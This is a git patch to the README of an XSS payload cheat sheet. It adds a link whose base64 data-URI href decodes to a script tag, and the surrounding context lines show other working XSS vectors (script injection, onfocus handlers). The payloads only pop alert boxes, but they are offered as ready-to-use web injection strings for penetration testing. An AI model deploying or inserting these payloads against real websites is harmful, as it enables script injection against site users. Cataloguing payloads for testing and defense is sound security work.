From c7a292c19da2af320d7446b5f12aa6f2de93e6d4 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Thu, 10 Jan 2019 18:24:43 +0100
Subject: [PATCH] XSS using base64 encoded href data in a link

---
 XSS injection/README.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index 9df2b3e..0cb2259 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```
 
+XSS using base64 encoded href data in a link
+
+```
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
+```
+
 ## XSS in wrappers javascript and data URI
 
 XSS with javascript:
@@ -939,4 +945,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
 - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 
 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
-- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
\ No newline at end of file
+- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)